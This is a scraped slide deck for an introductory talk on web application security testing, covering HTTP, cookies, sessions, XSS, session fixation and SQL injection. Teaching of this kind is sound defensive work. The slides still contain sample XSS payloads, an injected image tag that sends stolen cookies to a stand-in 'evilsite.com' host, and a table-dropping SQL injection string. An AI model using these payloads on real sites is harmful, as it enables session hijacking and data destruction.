Tomas Doran, profile picture
Uploaded byTomas Doran
KEY, PDF1,452 views

Webapp security testing

This talk will last about 1 hour and cover the basics of web application security and testing. It will discuss HTTP, host headers, cookies, sessions, session fixation attacks, cross-site scripting (XSS), how to test for XSS vulnerabilities, how to exploit XSS vulnerabilities, and SQL injection in a basic manner. The talk is intended just to cover the fundamentals and will not be comprehensive. No programming experience is required to understand the concepts presented. On Sunday there will be a workshop where attendees can have a more practical discussion and deeper exploration of the topics.

Embed presentation

Downloaded 17 times
1 / 180
2 / 180
3 / 180
4 / 180
5 / 180
6 / 180
7 / 180
8 / 180
9 / 180
10 / 180
11 / 180
12 / 180
13 / 180
14 / 180
15 / 180
16 / 180
17 / 180
18 / 180
19 / 180
20 / 180
21 / 180
22 / 180
23 / 180
24 / 180
25 / 180
26 / 180
27 / 180
28 / 180
29 / 180
30 / 180
31 / 180
32 / 180
33 / 180
34 / 180
35 / 180
36 / 180
37 / 180
38 / 180
39 / 180
40 / 180
41 / 180
42 / 180
43 / 180
44 / 180
45 / 180
46 / 180
47 / 180
48 / 180
49 / 180
50 / 180
51 / 180
52 / 180
53 / 180
54 / 180
55 / 180
56 / 180
57 / 180
58 / 180
59 / 180
60 / 180
61 / 180
62 / 180
63 / 180
64 / 180
65 / 180
66 / 180
67 / 180
68 / 180
69 / 180
70 / 180
71 / 180
72 / 180
73 / 180
74 / 180
75 / 180
76 / 180
77 / 180
78 / 180
79 / 180
80 / 180
81 / 180
82 / 180
83 / 180
84 / 180
85 / 180
86 / 180
87 / 180
88 / 180
89 / 180
90 / 180
91 / 180
92 / 180
93 / 180
94 / 180
95 / 180
96 / 180
97 / 180
98 / 180
99 / 180
100 / 180
101 / 180
102 / 180
103 / 180
104 / 180
105 / 180
106 / 180
107 / 180
108 / 180
109 / 180
110 / 180
111 / 180
112 / 180
113 / 180
114 / 180
115 / 180
116 / 180
117 / 180
118 / 180
119 / 180
120 / 180
121 / 180
122 / 180
123 / 180
124 / 180
125 / 180
126 / 180
127 / 180
128 / 180
129 / 180
130 / 180
131 / 180
132 / 180
133 / 180
134 / 180
135 / 180
136 / 180
137 / 180
138 / 180
139 / 180
140 / 180
141 / 180
142 / 180
143 / 180
144 / 180
145 / 180
146 / 180
147 / 180
148 / 180
149 / 180
150 / 180
151 / 180
152 / 180
153 / 180
154 / 180
155 / 180
156 / 180
157 / 180
158 / 180
159 / 180
160 / 180
161 / 180
162 / 180
163 / 180
164 / 180
165 / 180
166 / 180
167 / 180
168 / 180
169 / 180
170 / 180
171 / 180
172 / 180
173 / 180
174 / 180
175 / 180
176 / 180
177 / 180
178 / 180
179 / 180
180 / 180
Fundamentals of web application security & security testing t0m <bobtfish@bobtfish.net>
Who are you? • Open source hacker • github.com/bobtfish/ • Perl guy (sorry) - 160 CPAN modules • Core team for Catalyst and Plack web frameworks. • Ex professional security tester / R&D
This talk
This talk • ~ 1h long
This talk • ~ 1h long • Covers the very basics • HTTP • Host headers • Cookies
This talk • ~ 1h long • Covers the very basics • HTTP • Host headers • Cookies • Tools • Paros / Charles / etc
• Sessions • Session fixation attacks
• Sessions • Session fixation attacks • XSS (General HTML injection) • How to test • How to exploit
• Sessions • Session fixation attacks • XSS (General HTML injection) • How to test • How to exploit • SQL Injection
• NOT comprehensive.
• NOT comprehensive. • JUST the basics.
You don’t need to be a programmer
You don’t need to be a programmer • I’m going to assume you know a bit about the internet
You don’t need to be a programmer • I’m going to assume you know a bit about the internet • And that you’ve at least seen HTML before.
Workshop on Sunday
Workshop on Sunday • No schedule - made by you!
Workshop on Sunday • No schedule - made by you!
Workshop on Sunday • No schedule - made by you! • Deeper and more practical discussion
HTML
HTML • The markup format that web pages are written in.
HTML • The markup format that web pages are written in. • I’m just assuming you all know the basics
HTML • The markup format that web pages are written in. • I’m just assuming you all know the basics • Sorry if you don’t ;P
HTML • The markup format that web pages are written in. • I’m just assuming you all know the basics • Sorry if you don’t ;P • Can almost always be sloppy - browser tries to do the right thing.
HTTP - The very basics
HTTP - The very basics • HTTP goes over TCP/IP
HTTP - The very basics • HTTP goes over TCP/IP • Reliable, ordered
HTTP - The very basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port
HTTP - The very basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response
HTTP - The very basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response • URL
HTTP - The very basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response • URL • Method
Request / Response
Request / Response • You ask the sever for some data
Request / Response • You ask the sever for some data • It does some work
Request / Response • You ask the sever for some data • It does some work • And serves you a response, possibly including data, called a ‘body’
Dynamic
Dynamic • The response could just be a file on disc
Dynamic • The response could just be a file on disc • HTML, image, etc
Dynamic • The response could just be a file on disc • HTML, image, etc • We’re interested about when it’s dynamic - i.e. when your input changes the HTML output.
GET / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 29 Aug 2012 21:47:59 GMT Server: Apache Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT ETag: "1c888b-0-4a90a5e239540" Accept-Ranges: bytes Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html X-Pad: avoid browser bug
GET / HTTP/1.0
GET / HTTP/1.0 • Simplest possible HTTP request
GET / HTTP/1.0 • Simplest possible HTTP request • Method - GET
GET / HTTP/1.0 • Simplest possible HTTP request • Method - GET • URL /
GET / HTTP/1.0 • Simplest possible HTTP request • Method - GET • URL / • HTTP version
GET / HTTP/1.0 • Simplest possible HTTP request • Method - GET • URL / • HTTP version • Followed by rnrn
GET / HTTP/1.0 • Headers optional after first line
GET / HTTP/1.0 • Headers optional after first line • Body can be supplied after rnrn if you specify a non-zero content length
GET / HTTP/1.0 • Headers optional after first line • Body can be supplied after rnrn if you specify a non-zero content length • There will be examples of this later
HTTP/1.1 200 OK
HTTP/1.1 200 OK • Always the first line of the response
HTTP/1.1 200 OK • Always the first line of the response • We asked for 1.0, got 1.1 back
HTTP/1.1 200 OK • Always the first line of the response • We asked for 1.0, got 1.1 back • 200 is response code. • 2xx - Success • 3xx - Redirect • 4xx - User error • 5xx - Server error
Date: Wed, 29 Aug 2012 21:47:59 GMT • Other headers now follow. All in format: Key:Value • Date: RFC822 • Optional
Server: Apache • Sometimes has exact versions and extensions • Easy to lie • Optional
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT • Used for caching (maybe) • Optional
ETag: "1c888b-0-4a90a5e239540" • Used for caching (maybe) • Optional
Accept-Ranges: bytes • ‘Partial GET’ • Ask for a byte range in the file • Get back just that part • Used by ‘download managers’ to resume • Optional
Content-Length: 0 • Mandatory! • Specifies how long the body is • Can be 0
Vary: Accept-Encoding • For caching • What header fields mean a different version of the document • E.g. language detection • Optional
Connection: close • Server is going to drop the connection, you have to reconnect. • Possible to keep the connection persistent, if you ask for it
Content-Type: text/html • How the browser should interpret the body • Mandatory for documents with a body
HTTP 1.1 • Adds a mandatory Host header to the request • Allows > 1 web site per IP address
GET / HTTP/1.1 Host: goatse.co.uk HTTP/1.1 200 OK Date: Wed, 29 Aug 2012 21:49:49 GMT Server: Apache Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT ETag: "1c888b-0-4a90a5e239540" Accept-Ranges: bytes Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html X-Pad: avoid browser bug
Sending data to the server
Sending data to the server • Encode it into the URI
Sending data to the server • Encode it into the URI • /with/a/path
Sending data to the server • Encode it into the URI • /with/a/path • /?or=parameters
POST
POST • Used to send data back to the server
POST • Used to send data back to the server • Content-Type: application/x-www-form- urlencoded
POST • Used to send data back to the server • Content-Type: application/x-www-form- urlencoded • Has a Content-Length, and a body
POST • Used to send data back to the server • Content-Type: application/x-www-form- urlencoded • Has a Content-Length, and a body • Data is encoded like this: foo=bar&foo2=baz
POST POST / HTTP/1.1 Host: www.example.com Content-Length: 17 Content-Type: application/x-www-form-urlencoded foo=bar&foo2=quux
Forms • HTML forms are the primary means of getting user data to the server • Data is in the body, not the URL, so they don’t get saved in bookmarks • <form> tag • <input> tag
Ok - basics covered!
Ok - basics covered! • Phew!
Ok - basics covered! • Phew! • Lets put all this stuff together - into an application.
Ok - basics covered! • Phew! • Lets put all this stuff together - into an application. • And then hack it.
Simplest possible app <html> Data is: <form> <input name=”foo” value=”<?php echo $_GET['foo'] ?>” /> <input type=”submit” /> </form> </html>
http://server/test.php? foo=foo
FAIL
FAIL • Did you spot the epic fail?
FAIL • Did you spot the epic fail? • value=”<?php echo $_GET['foo'] ?>”
FAIL • Did you spot the epic fail? • value=”<?php echo $_GET['foo'] ?>” • Golden rule - never ever accept input without validating it’s sane
FAIL • Did you spot the epic fail? • value=”<?php echo $_GET['foo'] ?>” • Golden rule - never ever accept input without validating it’s sane • Golden rule - never ever output anything that may have come from external input without encoding it
WHY?
WHY? • You can send: ?foo="><blink>Foo< %2Fblink>
WHY? • You can send: ?foo="><blink>Foo< %2Fblink> • Comes out as: <input name="foo" value=""><blink>Foo</blink>
WHY? • You can send: ?foo="><blink>Foo< %2Fblink> • Comes out as: <input name="foo" value=""><blink>Foo</blink> • You just added HTML to the document - fail!
Javascript
Javascript • Is where it all goes really wrong
Javascript • Is where it all goes really wrong • Can change or rewrite the page
Javascript • Is where it all goes really wrong • Can change or rewrite the page • Can be inserted inline into HTML
Javascript • Is where it all goes really wrong • Can change or rewrite the page • Can be inserted inline into HTML • foo="><script>document.removeChild(doc ument.getElementsByTagName('html')[0])< %2Fscript>
Bye bye page!
Less simple example
Less simple example • Add data storage
Less simple example • Add data storage • E.g. Message board multiple people can look at
Less simple example • Add data storage • E.g. Message board multiple people can look at • Doom!
Less simple example • Add data storage • E.g. Message board multiple people can look at • Doom! • Or at least vandalism
More theory
More theory • Sorry, but it’s necessary
More theory • Sorry, but it’s necessary • People’s credit card numbers are behind login pages
More theory • Sorry, but it’s necessary • People’s credit card numbers are behind login pages • So we have to understand how logins work to steal them
Cookies
Cookies
Cookies Not like that!
Cookies
Cookies Or that!
Cookies
Cookies Definitely not!
Set-Cookie
Set-Cookie • A request header
Set-Cookie • A request header • Set-Cookie: foo=bar
Set-Cookie • A request header • Set-Cookie: foo=bar • Set-Cookie: foo=bar; expires=Thu, 01- Jan-1970 00:01:40 GMT; path=/; domain=example.net
Affects subsequent requests Browser returns “Cookie: foo=bar” header
Sessions
Sessions • Hand each visitor a random session token, identify them in future
Sessions • Hand each visitor a random session token, identify them in future • Login credentials only transmitted once
Sessions • Hand each visitor a random session token, identify them in future • Login credentials only transmitted once • Allows login to be SSL (and rest of site not)
Sessions
Sessions • Shared secret
Sessions • Shared secret • If it stops being a secret, you lose!
Stealing cookies
Stealing cookies • Can get cookie data from javascript
Stealing cookies • Can get cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie
Stealing cookies • Can get cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie • “Same origin policy” - cannot transmit elsewhere.
Stealing cookies • Can get cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie • “Same origin policy” - cannot transmit elsewhere. • Cheat! Add content to the document.
<img src=”http://evilsite.com/?data=here” />
Lets step through that
Lets step through that • Message board site gives users a cookie when they login
Lets step through that • Message board site gives users a cookie when they login • Cookie contains session token
Lets step through that • Message board site gives users a cookie when they login • Cookie contains session token • You post an evil message containing Javascript
Lets step through that • Message board site gives users a cookie when they login • Cookie contains session token • You post an evil message containing Javascript • Other users view your message
Lets step through that
Lets step through that • Other user’s browsers execute your javascript
Lets step through that • Other user’s browsers execute your javascript • It grabs their cookie
Lets step through that • Other user’s browsers execute your javascript • It grabs their cookie • Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />
Lets step through that • Other user’s browsers execute your javascript • It grabs their cookie • Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” /> • Users browser tries to download image
Lets step through that
Lets step through that • evilsite.com records the cookie
Lets step through that • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif
Lets step through that • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif • I can now post messages as any (still logged in) user who viewed my message.
Lets step through that • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif • I can now post messages as any (still logged in) user who viewed my message. • Having the users’s cookie allows you to become the user
Did you notice the handwave?
Did you notice the handwave? • I need a way to get your cookie into my browser
Did you notice the handwave? • I need a way to get your cookie into my browser • This is easy to do - find a proxy library in your favourite programming language ;P
Did you notice the handwave? • I need a way to get your cookie into my browser • This is easy to do - find a proxy library in your favourite programming language ;P • Or tools you can just download
Session fixation
Session fixation • Quite a common bug
Session fixation • Quite a common bug • Allows you to specify the session ID you’d like
Session fixation • Quite a common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere
Session fixation • Quite a common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere • Also good to steal logins without needing XSS.
Session fixation • Quite a common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere • Also good to steal logins without needing XSS. • /?sessionID=XXXXXXXXXXX
Tools
Tools - Paros • http://www.parosproxy.org/
Tools - Charles • OSX only • Costs money (free trial)
Tools - Firebug
Tools - Firebug • Firefox addon
Tools - Firebug • Firefox addon • Allows you to debug javascript and HTML
Tools - Firebug • Firefox addon • Allows you to debug javascript and HTML • Useful for getting exploits working in combination with another tool
SQL Injection
SQL Injection • SQL used by databases, for data storage
SQL Injection • SQL used by databases, for data storage • Tables, with columns and rows
SQL Injection • SQL used by databases, for data storage • Tables, with columns and rows • SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;
SQL Injection • SQL used by databases, for data storage • Tables, with columns and rows • SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’; • SAME ISSUE AS BEFORE
SQL Injection
SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
First query. No password needed! SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
Second query. Ruins your day! SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
Comment - ignored! SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
Golden Rules
Golden Rules • Never ever accept input without validating it’s sane.
Golden Rules • Never ever accept input without validating it’s sane. • Never ever output anything that may have come from external input without encoding it.
Thanks for listening! • Hope that wasn’t too boring :) • Feel free to come chat to me. • Or mail me: bobtfish@bobtfish.net • Or grab me on irc: t0m on Freenode • More in-depth workshop on Sunday!

More Related Content

KEY
Class1slides
byAlexis Goldstein
 
PDF
Hacking Web Performance 2019
byMaximiliano Firtman
 
PDF
2014 database - course 1 - www introduction
byHung-yu Lin
 
PPTX
Interactive web. O rly?
bytimbc
 
PDF
Ws phpl1 php_apps_basics_1.2
byKensaku Suzuki
 
PDF
LAWDI - Rogue Linked Data
byRyan Baumann
 
PPTX
SPDY - or maybe HTTP2.0
byAndreas Bjärlestam
 
PDF
Powering your website with realtime data
bybecoded
 
Class1slides
byAlexis Goldstein
 
Hacking Web Performance 2019
byMaximiliano Firtman
 
2014 database - course 1 - www introduction
byHung-yu Lin
 
Interactive web. O rly?
bytimbc
 
Ws phpl1 php_apps_basics_1.2
byKensaku Suzuki
 
LAWDI - Rogue Linked Data
byRyan Baumann
 
SPDY - or maybe HTTP2.0
byAndreas Bjärlestam
 
Powering your website with realtime data
bybecoded
 

What's hot

PPTX
HTML Training Course in Persian
byAbbas Naderi
 
PPTX
BTV PHP - Building Fast Websites
byJonathan Klein
 
PDF
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
byViktor Todorov
 
PPTX
WordPress CLI in-depth
bySanjay Willie
 
PPTX
Domino Security - not knowing is not an option (2016 edition)
byDarren Duke
 
PDF
CORS and (in)security
byn|u - The Open Security Community
 
PPS
Web Development in Perl
byNaveen Gupta
 
PDF
Perl in the Internet of Things
byDave Cross
 
PPT
Class 1 - World Wide Web Introduction
byAhmed Swilam
 
PDF
NotaCon 2011 - Networking for Pentesters
byRob Fuller
 
KEY
CakePHP 2.0 - PHP Matsuri 2011
byGraham Weldon
 
PDF
Concepts for Operating a Web Site
byCan Burak Çilingir
 
PDF
Top ten-list
byBrian DeShong
 
PPTX
Building APIs with MVC 6 and OAuth
byFilip Ekberg
 
PDF
Basics of HTML5 for Phonegap
byRakesh Jha
 
KEY
Site Performance - From Pinto to Ferrari
byJoseph Scott
 
PPTX
Re-thinking Performance tuning with HTTP2
byVinci Rufus
 
PPTX
Day 7 - Make it Fast
byBarry Jones
 
PPT
Web Browsers And Other Mistakes
byguest2821a2
 
PPT
Web Browsers And Other Mistakes
bykuza55
 
HTML Training Course in Persian
byAbbas Naderi
 
BTV PHP - Building Fast Websites
byJonathan Klein
 
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
byViktor Todorov
 
WordPress CLI in-depth
bySanjay Willie
 
Domino Security - not knowing is not an option (2016 edition)
byDarren Duke
 
CORS and (in)security
byn|u - The Open Security Community
 
Web Development in Perl
byNaveen Gupta
 
Perl in the Internet of Things
byDave Cross
 
Class 1 - World Wide Web Introduction
byAhmed Swilam
 
NotaCon 2011 - Networking for Pentesters
byRob Fuller
 
CakePHP 2.0 - PHP Matsuri 2011
byGraham Weldon
 
Concepts for Operating a Web Site
byCan Burak Çilingir
 
Top ten-list
byBrian DeShong
 
Building APIs with MVC 6 and OAuth
byFilip Ekberg
 
Basics of HTML5 for Phonegap
byRakesh Jha
 
Site Performance - From Pinto to Ferrari
byJoseph Scott
 
Re-thinking Performance tuning with HTTP2
byVinci Rufus
 
Day 7 - Make it Fast
byBarry Jones
 
Web Browsers And Other Mistakes
byguest2821a2
 
Web Browsers And Other Mistakes
bykuza55
 

Viewers also liked

PPT
Bioclipse
byguestd41014
 
PDF
Run a Smart SaaS Company
byTotango
 
PPSX
Nutrition and Food Products
byMay Wee
 
PDF
Sitting on the bench? Don't blame the recruiter
byStephanie Hain
 
PDF
Nash 2013 liliana
byLiliana Mendes
 
PPTX
Tendex - онлайн площадка для проведения электронных торгов
byE-COM UA
 
PDF
"The worst code I ever wrote"
byTomas Doran
 
PPTX
.NET Core Internals. O que é o .NET Platform Standard?
byVictor Cavalcante
 
PPTX
TWI Summit 2013: TWI on a Global Scale
bybusiness through people
 
PPTX
Much ado about...documents
byLiz Sundet, MVP, MBA, PMP, CBAP, CSM
 
PDF
Challenges Chemoinformatics Tool Contest Award Presentation
bymdpi_ch
 
PPTX
Marketing using social media
byHeather Hurley
 
PDF
TWI Summit Europe 2015 program
byJohn Vellema
 
PDF
The long and winding road to chemical information
byEngelbert Zass
 
PDF
Social media strategies instead of tools
byViệt Long Plaza
 
PPT
欧赛斯外星人探秘嘉年华网络公关营销提案
byqoolupeter
 
PDF
Hindustan Times HT Cafe- Cinema Promotes Pop Art
byarchana jhangiani
 
PDF
Wintry smoothie with grapefruits, pears and cashewnuts
byTastymania
 
PDF
Delivering Happiness, The New Secret Ingredient by Sunny Grosso
byAudienceView
 
PDF
Evolucion de la deuda publica por entidad federativa desde 1993 hasta 2006
byFroylan Angel Hernandez Ochoa
 
Bioclipse
byguestd41014
 
Run a Smart SaaS Company
byTotango
 
Nutrition and Food Products
byMay Wee
 
Sitting on the bench? Don't blame the recruiter
byStephanie Hain
 
Nash 2013 liliana
byLiliana Mendes
 
Tendex - онлайн площадка для проведения электронных торгов
byE-COM UA
 
"The worst code I ever wrote"
byTomas Doran
 
.NET Core Internals. O que é o .NET Platform Standard?
byVictor Cavalcante
 
TWI Summit 2013: TWI on a Global Scale
bybusiness through people
 
Much ado about...documents
byLiz Sundet, MVP, MBA, PMP, CBAP, CSM
 
Challenges Chemoinformatics Tool Contest Award Presentation
bymdpi_ch
 
Marketing using social media
byHeather Hurley
 
TWI Summit Europe 2015 program
byJohn Vellema
 
The long and winding road to chemical information
byEngelbert Zass
 
Social media strategies instead of tools
byViệt Long Plaza
 
欧赛斯外星人探秘嘉年华网络公关营销提案
byqoolupeter
 
Hindustan Times HT Cafe- Cinema Promotes Pop Art
byarchana jhangiani
 
Wintry smoothie with grapefruits, pears and cashewnuts
byTastymania
 
Delivering Happiness, The New Secret Ingredient by Sunny Grosso
byAudienceView
 
Evolucion de la deuda publica por entidad federativa desde 1993 hasta 2006
byFroylan Angel Hernandez Ochoa
 

Similar to Webapp security testing

PDF
CNIT 129S: Ch 3: Web Application Technologies
bySam Bowne
 
PDF
CNIT 129S - Ch 3: Web Application Technologies
bySam Bowne
 
PPTX
Lesson 6 web based attacks
byFrank Victory
 
PDF
Advanced Web Design And Development BIT 3207
byLori Head
 
ODP
PHP Training: Module 1
byhussulinux
 
PPTX
Web technologies: HTTP
byPiero Fraternali
 
PDF
Unit v
byAPARNA P
 
PPT
Ch-1_.ppt
byberihunmolla2
 
PPTX
Web technology introduction to the web and its history
byBKReddy3
 
PPTX
World Wide Web
byV.V.Vanniaperumal College for Women
 
PPT
A detailed presentation on the World Wide Web
byG.B. Pant University of Agriculture and Technology
 
PPTX
Browser
byShweta Oza
 
PPTX
Web & HTTP
byMansiSingh269494
 
ODP
Starting With Php
byHarit Kothari
 
PDF
12 core technologies you should learn, love, and hate to be a 'real' technocrat
bylinoj
 
PPT
Web Services 2009
byCathie101
 
PPT
Web Services 2009
byCathie101
 
PPTX
www and http services
byJenica Salmorin
 
PDF
Cgi
byAkramWaseem
 
PPT
WebEssentials- lecture 3.ppt
bySachinKundu10
 
CNIT 129S: Ch 3: Web Application Technologies
bySam Bowne
 
CNIT 129S - Ch 3: Web Application Technologies
bySam Bowne
 
Lesson 6 web based attacks
byFrank Victory
 
Advanced Web Design And Development BIT 3207
byLori Head
 
PHP Training: Module 1
byhussulinux
 
Web technologies: HTTP
byPiero Fraternali
 
Unit v
byAPARNA P
 
Ch-1_.ppt
byberihunmolla2
 
Web technology introduction to the web and its history
byBKReddy3
 
World Wide Web
byV.V.Vanniaperumal College for Women
 
A detailed presentation on the World Wide Web
byG.B. Pant University of Agriculture and Technology
 
Browser
byShweta Oza
 
Web & HTTP
byMansiSingh269494
 
Starting With Php
byHarit Kothari
 
12 core technologies you should learn, love, and hate to be a 'real' technocrat
bylinoj
 
Web Services 2009
byCathie101
 
Web Services 2009
byCathie101
 
www and http services
byJenica Salmorin
 
Cgi
byAkramWaseem
 
WebEssentials- lecture 3.ppt
bySachinKundu10
 

More from Tomas Doran

KEY
Webapp security testing
byTomas Doran
 
PDF
Building a smarter application stack - service discovery and wiring for Docker
byTomas Doran
 
PDF
Empowering developers to deploy their own data stores
byTomas Doran
 
PPTX
Long haul infrastructure: Failures and successes
byTomas Doran
 
KEY
Dates aghhhh!!?!?!?!
byTomas Doran
 
KEY
Messaging, interoperability and log aggregation - a new framework
byTomas Doran
 
KEY
Message:Passing - lpw 2012
byTomas Doran
 
KEY
London devops logging
byTomas Doran
 
PDF
Steamlining your puppet development workflow
byTomas Doran
 
KEY
Zero mq logs
byTomas Doran
 
KEY
Cooking a rabbit pie
byTomas Doran
 
PDF
Test driven infrastructure development (2 - puppetconf 2013 edition)
byTomas Doran
 
PDF
Docker puppetcamp london 2013
byTomas Doran
 
PDF
Chasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
byTomas Doran
 
PPT
Deploying puppet code at light speed
byTomas Doran
 
PDF
Sensu and Sensibility - Puppetconf 2014
byTomas Doran
 
PDF
Thinking through puppet code layout
byTomas Doran
 
PDF
Dockersh and a brief intro to the docker internals
byTomas Doran
 
PPT
London devops - orc
byTomas Doran
 
PDF
Test driven infrastructure development
byTomas Doran
 
Webapp security testing
byTomas Doran
 
Building a smarter application stack - service discovery and wiring for Docker
byTomas Doran
 
Empowering developers to deploy their own data stores
byTomas Doran
 
Long haul infrastructure: Failures and successes
byTomas Doran
 
Dates aghhhh!!?!?!?!
byTomas Doran
 
Messaging, interoperability and log aggregation - a new framework
byTomas Doran
 
Message:Passing - lpw 2012
byTomas Doran
 
London devops logging
byTomas Doran
 
Steamlining your puppet development workflow
byTomas Doran
 
Zero mq logs
byTomas Doran
 
Cooking a rabbit pie
byTomas Doran
 
Test driven infrastructure development (2 - puppetconf 2013 edition)
byTomas Doran
 
Docker puppetcamp london 2013
byTomas Doran
 
Chasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
byTomas Doran
 
Deploying puppet code at light speed
byTomas Doran
 
Sensu and Sensibility - Puppetconf 2014
byTomas Doran
 
Thinking through puppet code layout
byTomas Doran
 
Dockersh and a brief intro to the docker internals
byTomas Doran
 
London devops - orc
byTomas Doran
 
Test driven infrastructure development
byTomas Doran
 

Recently uploaded

PPTX
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
PDF
Our Digital Tribe_ Cultivating Connection and Growth in Our Slack Community 🌿...
bysanjeetmishra30
 
PDF
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
PPTX
communication-skills-with-technology tools
byJaleto Sunkemo
 
PDF
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
PPTX
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
PDF
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PPTX
cybercrime in Information security .pptx
byismaeelsahib032
 
PPTX
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
PDF
API-First Architecture in Financial Systems
bycyy111112
 
PPTX
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
PPTX
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
PDF
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
PDF
December Patch Tuesday
byIvanti
 
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Our Digital Tribe_ Cultivating Connection and Growth in Our Slack Community 🌿...
bysanjeetmishra30
 
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
communication-skills-with-technology tools
byJaleto Sunkemo
 
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
cybercrime in Information security .pptx
byismaeelsahib032
 
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
API-First Architecture in Financial Systems
bycyy111112
 
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
December Patch Tuesday
byIvanti
 

Webapp security testing

  • 1.
    Fundamentals of web applicationsecurity & security testing t0m <bobtfish@bobtfish.net>
  • 2.
    Who are you? •Open source hacker • github.com/bobtfish/ • Perl guy (sorry) - 160 CPAN modules • Core team for Catalyst and Plack web frameworks. • Ex professional security tester / R&D
  • 3.
  • 4.
  • 5.
    This talk • ~1h long • Covers the very basics • HTTP • Host headers • Cookies
  • 6.
    This talk • ~1h long • Covers the very basics • HTTP • Host headers • Cookies • Tools • Paros / Charles / etc
  • 8.
    • Sessions •Session fixation attacks
  • 9.
    • Sessions •Session fixation attacks • XSS (General HTML injection) • How to test • How to exploit
  • 10.
    • Sessions •Session fixation attacks • XSS (General HTML injection) • How to test • How to exploit • SQL Injection
  • 11.
  • 12.
  • 13.
    You don’t needto be a programmer
  • 14.
    You don’t needto be a programmer • I’m going to assume you know a bit about the internet
  • 15.
    You don’t needto be a programmer • I’m going to assume you know a bit about the internet • And that you’ve at least seen HTML before.
  • 16.
  • 17.
    Workshop on Sunday •No schedule - made by you!
  • 18.
    Workshop on Sunday •No schedule - made by you!
  • 19.
    Workshop on Sunday •No schedule - made by you! • Deeper and more practical discussion
  • 20.
  • 21.
    HTML • The markupformat that web pages are written in.
  • 22.
    HTML • The markupformat that web pages are written in. • I’m just assuming you all know the basics
  • 23.
    HTML • The markupformat that web pages are written in. • I’m just assuming you all know the basics • Sorry if you don’t ;P
  • 24.
    HTML • The markupformat that web pages are written in. • I’m just assuming you all know the basics • Sorry if you don’t ;P • Can almost always be sloppy - browser tries to do the right thing.
  • 25.
    HTTP - Thevery basics
  • 26.
    HTTP - Thevery basics • HTTP goes over TCP/IP
  • 27.
    HTTP - Thevery basics • HTTP goes over TCP/IP • Reliable, ordered
  • 28.
    HTTP - Thevery basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port
  • 29.
